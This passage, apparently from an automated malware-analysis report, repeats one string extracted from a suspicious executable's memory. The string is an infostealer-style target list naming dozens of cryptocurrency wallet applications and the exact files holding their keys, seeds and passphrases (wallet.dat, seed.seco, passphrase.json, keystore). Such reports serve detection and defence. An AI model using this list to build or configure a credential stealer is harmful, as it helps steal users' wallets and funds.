Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
